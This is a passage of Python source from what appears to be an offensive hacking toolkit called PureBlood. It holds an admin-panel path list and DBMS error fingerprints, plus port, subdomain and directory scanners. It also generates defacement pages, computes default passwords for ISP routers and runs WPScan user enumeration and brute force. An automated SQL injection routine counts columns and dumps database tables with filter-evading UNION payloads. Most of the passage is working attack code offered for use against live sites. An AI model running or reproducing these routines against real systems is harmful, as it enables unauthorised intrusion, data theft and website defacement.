dmin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html','/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','cp.html','/adminpanel.php','/moderator.html','/administrator/index.html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html','/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html','/admincontrol/login.html','/adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html','/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/adminarea/index.php','/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php','/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php','adm/index.php','adm.php','affiliate.php','/adm_auth.php ','/memberadmin.php','/administratorlogin.php','/login/admin.asp','/admin/login.asp','/administratorlogin.asp','/login/asmindstrator.asp','/admin/login.aspx','/login/admin.aspx','/administartorlogin.aspx','login/administrator.aspx','/adminlogin.asp','a/dminlogin.aspx','/admin_login.asp','/admin_login.aspx','/adminhome.asp','/adminhome.aspx''/administrator_login.asp','/administrator_login.aspx'] 176 | admin_panel_valid = [] 177 | 178 | dbms_errors = { 179 | 'MySQL': (r'SQL syntax.*MySQL', r'Warning.*mysql_.*', r'MySQL Query fail.*', r'SQL syntax.*MariaDB server'), 180 | 'PostgreSQL': (r'PostgreSQL.*ERROR', r'Warning.*\Wpg_.*', r'Warning.*PostgreSQL'), 181 | 'Microsoft SQL Server': (r'OLE DB.* SQL Server', r'(\W|\A)SQL Server.*Driver', r'Warning.*odbc_.*', r'Warning.*mssql_', r'Msg \d+, Level \d+, State \d+', r'Unclosed quotation mark after the character string', r'Microsoft OLE DB Provider for ODBC Drivers'), 182 | 'Microsoft Access': (r'Microsoft Access Driver', r'Access Database Engine', r'Microsoft JET Database Engine', r'.*Syntax error.*query expression'), 183 | 'Oracle': (r'\bORA-[0-9][0-9][0-9][0-9]', r'Oracle error', r'Warning.*oci_.*', 'Microsoft OLE DB Provider for Oracle'), 184 | 'IBM DB2': (r'CLI Driver.*DB2', r'DB2 SQL error'), 185 | 'SQLite': (r'SQLite/JDBCDriver', r'System.Data.SQLite.SQLiteException'), 186 | 'Informix': (r'Warning.*ibase_.*', r'com.informix.jdbc'), 187 | 'Sybase': (r'Warning.*sybase.*', r'Sybase message') 188 | } 189 | 190 | ## Threading Object Funtions 191 | def TCP_connect(ip, port_number, delay, output): 192 | TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 193 | TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 194 | TCPsock.settimeout(delay) 195 | try: 196 | TCPsock.connect((ip, port_number)) 197 | output[port_number] = 'Open' 198 | except: 199 | output[port_number] = '' 200 | 201 | def dns_record_scanner(drs_hostname, ids_item, dns_record_list): 202 | try: 203 | answers = dns.resolver.query(drs_hostname, ids_item) 204 | for rdata in answers: 205 | ids_item = str(ids_item); rdata = str(rdata) 206 | dns_record_list.append(str(ids_item + ' : ' + rdata)) 207 | except Exception: 208 | print("The scanner Error has happened, we will continue") 209 | pass 210 | 211 | def subdomain_scanner(subdomain, so_200, so_301, so_302, so_403): 212 | subdomain = 'http://' + subdomain 213 | try: 214 | subdomain_scanner_request = requests.get(subdomain) 215 | subdomain_scanner_code = subdomain_scanner_request.status_code 216 | if subdomain_scanner_code == 200: 217 | so_200.append(subdomain) 218 | elif subdomain_scanner_code == 301: 219 | so_301.append(subdomain) 220 | elif subdomain_scanner_code == 302: 221 | so_302.append(subdomain) 222 | elif subdomain_scanner_code == 403: 223 | so_403.append(subdomain) 224 | except ConnectionError: 225 | print("Connection Error has happened, we will continue") 226 | pass 227 | 228 | def directory_scanner(ds_url_list, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3): 229 | try: 230 | directory_fuzz_request = requests.get(ds_url_list) 231 | if directory_fuzz_request.status_code == 200: 232 | directory_fuzz_final1.append(ds_url_list) 233 | elif directory_fuzz_request.status_code == 301 or directory_fuzz_request.status_code == 302: 234 | directory_fuzz_final2.append(ds_url_list) 235 | elif directory_fuzz_request.status_code == 403: 236 | directory_fuzz_final3.append(ds_url_list) 237 | except: 238 | print("Scanner Error has happened, we will continue") 239 | pass 240 | 241 | def file_scanner(fs_url_list, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3): 242 | try: 243 | file_fuzz_request = requests.get(fs_url_list) 244 | if file_fuzz_request.status_code == 200: 245 | file_fuzz_final1.append(fs_url_list) 246 | elif file_fuzz_request.status_code == 301 or file_fuzz_request.status_code == 302: 247 | file_fuzz_final2.append(fs_url_list) 248 | elif file_fuzz_request.status_code == 403: 249 | file_fuzz_final3.append(fs_url_list) 250 | except: 251 | print("Scanner Issue has arised, we will continue") 252 | pass 253 | # END GLOBAL 254 | ######################################################################################################################################################### 255 | 256 | class Generator: 257 | def deface_page(self, title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups): 258 | deface_page_template = ''' 259 | 260 | 261 | --=[ Hacked By {0} ]=-- 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 274 | 275 | 276 |
277 |
278 | 279 |

Hacked By {5}



280 |

{6}

281 |

{7}



282 |

Greetings: {8}

283 |
284 |
285 | 286 | 287 | '''.format(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups, '@import') 288 | self.deface_page_result = deface_page_template 289 | return self.deface_page_result 290 | 291 | def password_generator(self, length, text): 292 | password_generator_final1 = '' 293 | password_generator_final2 = '' 294 | password_generator_final3 = '' 295 | chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-_=+[{}];:\'"\|,<.>/?`~' 296 | for i in range(length): 297 | char_random = random.choice(chars) 298 | password_generator_final1 += char_random 299 | password_generator_final2 = hashlib.md5(text.encode('utf-8')).hexdigest() 300 | l33t_alphabet = ['4','8','(','|)','3','|=','9','#','1','_|','|<','|_','|\/|','|\|','0','|D','(,)','|2','$','7','|_|','\/','\/\/','><','\'/','(/)'] 301 | for i in text: 302 | if i == 'a' or i == 'A': 303 | text = text.replace('a', l33t_alphabet[0]).replace('A', l33t_alphabet[0]) 304 | elif i == 'b' or i == 'B': 305 | text = text.replace('b', l33t_alphabet[1]).replace('B', l33t_alphabet[1]) 306 | elif i == 'c' or i == 'C': 307 | text = text.replace('c', l33t_alphabet[2]).replace('C', l33t_alphabet[2]) 308 | elif i == 'd' or i == 'D': 309 | text = text.replace('d', l33t_alphabet[3]).replace('D', l33t_alphabet[3]) 310 | elif i == 'e' or i == 'E': 311 | text = text.replace('e', l33t_alphabet[4]).replace('E', l33t_alphabet[4]) 312 | elif i == 'f' or i == 'F': 313 | text = text.replace('f', l33t_alphabet[5]).replace('F', l33t_alphabet[5]) 314 | elif i == 'g' or i == 'G': 315 | text = text.replace('g', l33t_alphabet[6]).replace('G', l33t_alphabet[6]) 316 | elif i == 'h' or i == 'H': 317 | text = text.replace('h', l33t_alphabet[7]).replace('H', l33t_alphabet[7]) 318 | elif i == 'i' or i == 'I': 319 | text = text.replace('i', l33t_alphabet[8]).replace('I', l33t_alphabet[8]) 320 | elif i == 'j' or i == 'J': 321 | text = text.replace('j', l33t_alphabet[9]).replace('J', l33t_alphabet[9]) 322 | elif i == 'k' or i == 'K': 323 | text = text.replace('k', l33t_alphabet[10]).replace('K', l33t_alphabet[10]) 324 | elif i == 'l' or i == 'L': 325 | text = text.replace('l', l33t_alphabet[11]).replace('L', l33t_alphabet[11]) 326 | elif i == 'm' or i == 'M': 327 | text = text.replace('m', l33t_alphabet[12]).replace('M', l33t_alphabet[12]) 328 | elif i == 'n' or i == 'N': 329 | text = text.replace('n', l33t_alphabet[13]).replace('N', l33t_alphabet[13]) 330 | elif i == 'o' or i == 'O': 331 | text = text.replace('o', l33t_alphabet[14]).replace('O', l33t_alphabet[14]) 332 | elif i == 'p' or i == 'P': 333 | text = text.replace('p', l33t_alphabet[15]).replace('P', l33t_alphabet[15]) 334 | elif i == 'q' or i == 'Q': 335 | text = text.replace('q', l33t_alphabet[16]).replace('Q', l33t_alphabet[16]) 336 | elif i == 'r' or i == 'R': 337 | text = text.replace('r', l33t_alphabet[17]).replace('R', l33t_alphabet[17]) 338 | elif i == 's' or i == 'S': 339 | text = text.replace('s', l33t_alphabet[18]).replace('S', l33t_alphabet[18]) 340 | elif i == 't' or i == 'T': 341 | text = text.replace('t', l33t_alphabet[19]).replace('T', l33t_alphabet[19]) 342 | elif i == 'u' or i == 'U': 343 | text = text.replace('u', l33t_alphabet[20]).replace('U', l33t_alphabet[20]) 344 | elif i == 'v' or i == 'V': 345 | text = text.replace('v', l33t_alphabet[21]).replace('V', l33t_alphabet[21]) 346 | elif i == 'w' or i == 'W': 347 | text = text.replace('w', l33t_alphabet[22]).replace('W', l33t_alphabet[22]) 348 | elif i == 'x' or i == 'X': 349 | text = text.replace('x', l33t_alphabet[23]).replace('X', l33t_alphabet[23]) 350 | elif i == 'y' or i == 'Y': 351 | text = text.replace('y', l33t_alphabet[24]).replace('Y', l33t_alphabet[24]) 352 | elif i == 'z' or i == 'Z': 353 | text = text.replace('z', l33t_alphabet[25]).replace('Z', l33t_alphabet[25]) 354 | password_generator_final3 = text 355 | self.password_generator_result1 = password_generator_final1 356 | self.password_generator_result2 = password_generator_final2 357 | self.password_generator_result3 = password_generator_final3 358 | return self.password_generator_result1, self.password_generator_result2, self.password_generator_result3 359 | 360 | def pldt_password_calculator(self, digit5, mac5): 361 | pldt_password_calculator_final1 = ['PLDTWIFI' + digit5, 'pldtwifi'+ digit5] 362 | pldt_password_calculator_final2_multiply = digit5 * 3 363 | pldt_password_calculator_final2 = ['PLDTWIFI' + pldt_password_calculator_final2_multiply, 'pldtwifi' + pldt_password_calculator_final2_multiply] 364 | digit55 = digit5 365 | for i in digit55: 366 | if i == '0': 367 | digit55.replace('0', 'f') 368 | elif i == '4': 369 | digit55.replace('4', 'b') 370 | elif i == '8': 371 | digit55.replace('8', '7') 372 | elif i == 'c': 373 | digit55.replace('c', '3') 374 | elif i == '1': 375 | digit55.replace('1', 'e') 376 | elif i == '5': 377 | digit55.replace('5', 'a') 378 | elif i == '9': 379 | digit55.replace('9', '6') 380 | elif i == 'd': 381 | digit55.replace('d', '2') 382 | elif i == '2': 383 | digit55.replace('2', 'd') 384 | elif i == '6': 385 | digit55.replace('6', '9') 386 | elif i == 'a': 387 | digit55.replace('a', '5') 388 | elif i == 'e': 389 | digit55.replace('e', '1') 390 | elif i == '3': 391 | digit55.replace('3', 'c') 392 | elif i == '7': 393 | digit55.replace('7', '8') 394 | elif i == 'b': 395 | digit55.replace('b', '4') 396 | elif i == 'f': 397 | digit55.replace('f', '0') 398 | pldt_password_calculator_final3 = 'wlan' + digit55 399 | pldt_password_calculator_final4 = ['PLDTWIFI' + digit55, 'pldtwifi' + digit55] 400 | pldt_password_calculator_final5 = 'HomeBro_' + mac5 401 | self.pldt_password_calculator_result1 = pldt_password_calculator_final1 402 | self.pldt_password_calculator_result2 = pldt_password_calculator_final2 403 | self.pldt_password_calculator_result3 = pldt_password_calculator_final3 404 | self.pldt_password_calculator_result4 = pldt_password_calculator_final4 405 | self.pldt_password_calculator_result5 = pldt_password_calculator_final5 406 | return self.pldt_password_calculator_result1, self.pldt_password_calculator_result2, self.pldt_password_calculator_result3, self.pldt_password_calculator_result4, self.pldt_password_calculator_result5 407 | 408 | def text_to_hash(self, text): 409 | md5_final = hashlib.md5(text.encode('utf-8')).hexdigest() 410 | sha1_final = hashlib.sha1(text.encode('utf-8')).hexdigest() 411 | sha224_final = hashlib.sha224(text.encode('utf-8')).hexdigest() 412 | sha256_final = hashlib.sha256(text.encode('utf-8')).hexdigest() 413 | sha384_final = hashlib.sha384(text.encode('utf-8')).hexdigest() 414 | sha512_final = hashlib.sha512(text.encode('utf-8')).hexdigest() 415 | md4 = hashlib.new('md4') 416 | md4.update(text.encode('utf-8')) 417 | md4_final = md4.hexdigest() 418 | ripemd160 = hashlib.new('ripemd160') 419 | ripemd160.update(text.encode('utf-8')) 420 | ripemd160_final = ripemd160.hexdigest() 421 | whirlpool = hashlib.new('whirlpool') 422 | whirlpool.update(text.encode('utf-8')) 423 | whirlpool_final = whirlpool.hexdigest() 424 | text_to_hash_final = """ 425 | Text To Hash Result: 426 | [+] MD4: {0} 427 | [+] MD5: {1} 428 | [+] SHA1: {2} 429 | [+] SHA224: {3} 430 | [+] SHA256: {4} 431 | [+] SHA384: {5} 432 | [+] SHA512: {6} 433 | [+] RipeMD160: {7} 434 | [+] Whirlpool: {8} 435 | """.format(md4_final, md5_final, sha1_final, sha224_final, sha256_final, sha384_final, sha512_final, ripemd160_final, whirlpool_final) 436 | self.text_to_hash_result = text_to_hash_final 437 | return self.text_to_hash_result 438 | 439 | 440 | 441 | class WebApplicationAttack: 442 | def wp_scan(self, url): 443 | wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 444 | if wp_scan_test_ruby_command == 0: 445 | pass 446 | elif wp_scan_test_ruby_command == 1: 447 | print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow)) 448 | print ('Ruby Installer: https://rubyinstaller.org/') 449 | time.sleep(2) 450 | print ('') 451 | web_application_attack() 452 | if platform.system() == 'Windows': 453 | if not os.path.exists('external/wpscan-master'): 454 | wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 455 | if wp_scan_download_curl == 0: 456 | wp_scan_unzip = zipfile.ZipFile('master.zip', 'r') 457 | wp_scan_unzip.extractall('external/') 458 | wp_scan_unzip.close() 459 | os.remove('master.zip') 460 | elif wp_scan_download_curl == 1: 461 | if os.path.exists('external/wpscan'): 462 | os.rename('external/wpscan', 'external/wpscan-master') 463 | else: 464 | wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 465 | if wp_scan_download_git == 0: 466 | os.rename('external/wpscan', 'external/wpscan-master') 467 | elif wp_scan_download_git == 1: 468 | print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow)) 469 | print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html') 470 | time.sleep(2) 471 | print ('') 472 | web_application_attack() 473 | else: 474 | pass 475 | wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 476 | if wp_scan != 0: 477 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 478 | print (""" 479 | Linux / MAC OS: 480 | https://wpscan.org 481 | Android: 482 | Termux / GNURoot 483 | Windows: 484 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 485 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 486 | Kali Linux: 487 | sudo apt-get install wpscan""") 488 | time.sleep(2) 489 | print ('') 490 | web_application_attack() 491 | else: 492 | pass 493 | else: 494 | wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 495 | if wp_scan != 0: 496 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 497 | print (""" 498 | Linux / MAC OS: 499 | https://wpscan.org 500 | Android: 501 | Termux / GNURoot 502 | Windows: 503 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 504 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 505 | Kali Linux: 506 | sudo apt-get install wpscan""") 507 | time.sleep(2) 508 | print ('') 509 | web_application_attack() 510 | else: 511 | pass 512 | if wp_scan == 0: 513 | pass 514 | elif wp_scan == 1: 515 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow)) 516 | print (""" 517 | Linux / MAC OS: 518 | https://wpscan.org 519 | Android: 520 | Termux / GNURoot 521 | Windows: 522 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 523 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 524 | Kali Linux: 525 | sudo apt-get install wpscan""") 526 | time.sleep(2) 527 | print ('') 528 | web_application_attack() 529 | if platform.system() == 'Windows': 530 | print ('[#] - Updating WPScan:') 531 | subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True) 532 | print ('\n[#] - Running WPScan:') 533 | if sys.version_info[0] == 3: 534 | wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 535 | elif sys.version_info[0] == 2: 536 | wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 537 | try: 538 | subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True) 539 | except Exception as e: 540 | print ('[!] - Error: {0}'.format(e)) 541 | time.sleep(2) 542 | print ('') 543 | web_application_attack() 544 | else: 545 | print ('[#] - Updating WPScan:') 546 | subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True) 547 | print ('\n[#] - Running WPScan:') 548 | if sys.version_info[0] == 3: 549 | wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 550 | elif sys.version_info[0] == 2: 551 | wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red))) 552 | try: 553 | subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True) 554 | except Exception as e: 555 | print ('[!] - Error: {e}'.format(e)) 556 | time.sleep(2) 557 | print ('') 558 | web_application_attack() 559 | 560 | def wp_scan_bruteforce(self, url): 561 | wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 562 | if wp_scan_test_ruby_command == 0: 563 | pass 564 | elif wp_scan_test_ruby_command == 1: 565 | print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow)) 566 | print ('Ruby Installer: https://rubyinstaller.org/') 567 | time.sleep(2) 568 | print ('') 569 | web_application_attack() 570 | if platform.system() == 'Windows': 571 | if not os.path.exists('external/wpscan-master'): 572 | wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 573 | if wp_scan_download_curl == 0: 574 | wp_scan_unzip = zipfile.ZipFile('master.zip', 'r') 575 | wp_scan_unzip.extractall('external/') 576 | wp_scan_unzip.close() 577 | os.remove('master.zip') 578 | elif wp_scan_download_curl == 1: 579 | if os.path.exists('external/wpscan'): 580 | os.rename('external/wpscan', 'external/wpscan-master') 581 | else: 582 | wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 583 | if wp_scan_download_git == 0: 584 | os.rename('external/wpscan', 'external/wpscan-master') 585 | elif wp_scan_download_git == 1: 586 | print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow)) 587 | print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html') 588 | time.sleep(2) 589 | print ('') 590 | web_application_attack() 591 | else: 592 | pass 593 | wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 594 | if wp_scan != 0: 595 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 596 | print (""" 597 | Linux / MAC OS: 598 | https://wpscan.org 599 | Android: 600 | Termux / GNURoot 601 | Windows: 602 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 603 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 604 | Kali Linux: 605 | sudo apt-get install wpscan""") 606 | time.sleep(2) 607 | print ('') 608 | web_application_attack() 609 | else: 610 | pass 611 | else: 612 | wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 613 | if wp_scan != 0: 614 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow)) 615 | print (""" 616 | Linux / MAC OS: 617 | https://wpscan.org 618 | Android: 619 | Termux / GNURoot 620 | Windows: 621 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 622 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 623 | Kali Linux: 624 | sudo apt-get install wpscan""") 625 | time.sleep(2) 626 | print ('') 627 | web_application_attack() 628 | else: 629 | pass 630 | if wp_scan == 0: 631 | pass 632 | elif wp_scan == 1: 633 | print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow)) 634 | print (""" 635 | Linux / MAC OS: 636 | https://wpscan.org 637 | Android: 638 | Termux / GNURoot 639 | Windows: 640 | http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10 641 | https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html 642 | Kali Linux: 643 | sudo apt-get install wpscan""") 644 | time.sleep(2) 645 | print ('') 646 | web_application_attack() 647 | if platform.system() == 'Windows': 648 | print ('[#] - Updating WPScan:') 649 | subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True) 650 | print ('\n[#] - Running WPScan:') 651 | if sys.version_info[0] == 3: 652 | wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 653 | wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 654 | elif sys.version_info[0] == 2: 655 | wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 656 | wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 657 | try: 658 | subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True) 659 | except Exception as e: 660 | print ('[!] - Error: {0}'.format(e)) 661 | time.sleep(2) 662 | print ('') 663 | web_application_attack() 664 | else: 665 | print ('[#] - Updating WPScan:') 666 | subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True) 667 | print ('\n[#] - Running WPScan:') 668 | if sys.version_info[0] == 3: 669 | wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 670 | wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 671 | elif sys.version_info[0] == 2: 672 | wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red))) 673 | wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red))) 674 | try: 675 | subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True) 676 | except Exception as e: 677 | print ('[!] - Error: {0}'.format(e)) 678 | time.sleep(2) 679 | print ('') 680 | web_application_attack() 681 | print (reset) 682 | print ('{0}='.format(red) * int(sizex)) 683 | web_application_attack() 684 | 685 | def auto_sql_injection(self, url): 686 | print ('[#] - Auto SQL Injection Running on -> {0}'.format(url)) 687 | auto_sql_injection_request_origin = requests.get(url) 688 | auto_sql_injection_request_origin_html = BeautifulSoup(auto_sql_injection_request_origin.text, 'html.parser') 689 | auto_sql_injection_request_origin_html_h1 = auto_sql_injection_request_origin_html.find_all('h1') 690 | auto_sql_injection_request_origin_html_h2 = auto_sql_injection_request_origin_html.find_all('h2') 691 | auto_sql_injection_request_origin_html_h3 = auto_sql_injection_request_origin_html.find_all('h3') 692 | auto_sql_injection_request_origin_html_p = auto_sql_injection_request_origin_html.find_all('p') 693 | print ('[~] - Checking If Vulnerable') 694 | auto_sql_injection_request = requests.get('{0}\''.format(url)) 695 | auto_sql_injection_request_url = '{0}\''.format(url) 696 | auto_sql_injection_request_result = '' 697 | auto_sql_injection_request_i = '' 698 | if auto_sql_injection_request.status_code == 200: 699 | for db, errors in dbms_errors.items(): 700 | for error in errors: 701 | if re.compile(error).search(auto_sql_injection_request.text): 702 | error = re.compile(error) 703 | auto_sql_injection_request_result = 'Vulnerable1' 704 | print ('[+] - Vulnerable: Database -> ({0})'.format(db)) 705 | if auto_sql_injection_request_result == '': 706 | if auto_sql_injection_request_origin.text != auto_sql_injection_request.text: 707 | auto_sql_injection_request_result = 'Vulnerable2' 708 | print ('[+] - Vulnerable: NO Syntax Error') 709 | elif auto_sql_injection_request.status_code == 403: 710 | print ('[!] - Not Vulnerable!') 711 | elif auto_sql_injection_request.status_code == 406: 712 | print ('[!] - Not Vulnerable!') 713 | if auto_sql_injection_request_result == 'Vulnerable1': 714 | auto_sql_injection_request_ii = 0 715 | auto_sql_injection_request_iii = '' 716 | print ('[~] - Counting How Many Columns:') 717 | auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1')) 718 | if ' order by 1--' in auto_sql_injection_request_orderby.text or 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text: 719 | auto_sql_injection_orderby_result = 'err1' 720 | else: 721 | auto_sql_injection_orderby_result = '' 722 | if auto_sql_injection_orderby_result == 'err1': 723 | single_quote_payload = '' 724 | else: 725 | single_quote_payload = '\'' 726 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, '100')) 727 | if 'Unknown column' in auto_sql_injection_request_orderby.text and '
{0}'.format(str(i))) 737 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i))) 738 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 739 | break 740 | if auto_sql_injection_orderby_result == 'err1': 741 | if 'Unknown column' in auto_sql_injection_request_orderby.text and '
{0}'.format(str(i))) 763 | auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i))) 764 | if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406: 765 | break 766 | if auto_sql_injection_orderby_result == 'err1': 767 | if 'Unknown column' in auto_sql_injection_request_orderby.text and '
')) 923 | sqli_table = user_choice1 924 | user_choice = str(input('\tColumn> ')) 925 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 926 | break 927 | else: 928 | sqli_column.append(user_choice) 929 | if sys.version_info[0] == 2: 930 | if sqli_table: 931 | pass 932 | elif not sqli_table: 933 | user_choice1 = str(raw_input('Table> ')) 934 | sqli_table = user_choice1 935 | user_choice = str(raw_input('\tColumn> ')) 936 | if user_choice == 'done' or user_choice == 'exit' or user_choice == '': 937 | break 938 | else: 939 | sqli_column.append(user_choice) 940 | print ('') 941 | print ('[~] Dumping Columns:') 942 | for i in sqli_column: 943 | auto_sql_injection_request_column_dump_list = [] 944 | auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table) 945 | auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',') 946 | auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('', i) 947 | auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url) 948 | auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser') 949 | auto_sql_injection_request_column_dump_soup_pureblood = 